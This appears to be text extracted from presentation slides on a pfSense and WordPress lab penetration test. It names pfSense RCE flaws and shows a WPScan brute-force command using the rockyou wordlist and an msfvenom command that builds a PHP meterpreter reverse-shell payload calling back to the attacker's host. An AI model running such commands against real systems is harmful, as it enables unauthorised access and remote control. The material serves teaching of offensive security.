6. Title and Content Layout with List
• Add your first bullet point here
• Add your second bullet point here
• Add your third bullet point here
5
7. ?
A free and open source
operating system for
routers and firewalls
Can be installed on a
physical computer or a
virtual machine to make a
dedicated firewall/router for
a network
Configured as DHCP
server, DNS server, WIFI
access point, VPN server,
all running on the same
hardware device.
6
10. pfSense authenticated graph status RCE
Looking for the PfSense’s exploit
8
Tricking an authenticated admin
into interacting with a specially
crafted webpage
Click jacking Vulnerability In CSRF Error Page
pfSense
PfSense authenticated graph status RCE
A non-administrative authenticated attacker
can inject arbitrary operating system
commands and execute them as the root
user
PfSense authenticated group member RCE
A remote command execution
vulnerability post authentication in the
system_groupmanager.php page
23. we can ping the internal IP of pfsense
And by nmap we found
Now we can ping the internal IP of
pfsense
And by nmap we have found that
both PFSENSE and UBUNTU are UP
!!!
19
29. Brut force attack using Wpscan
25
rockyou wordlist: is a password dictionary that exist by default in kali linux
30. Brut force attack using Wpscan
26
Wpscan –url http://x.x.x.x –U admin –P /usr/share/wordlists/rockyou.txt
username and list of password to use during the attack
31. Generate malicious PHP script
27
msfvenom is a combination of :
• msfpayload (generate a payload in a specified format )
• msfencode (encode and obfuscate the payload using various algorithms)
Msfvenom –p php/meterpreter/reverse_tcp lhost=@kali lport=4444 –f raw
payload to use format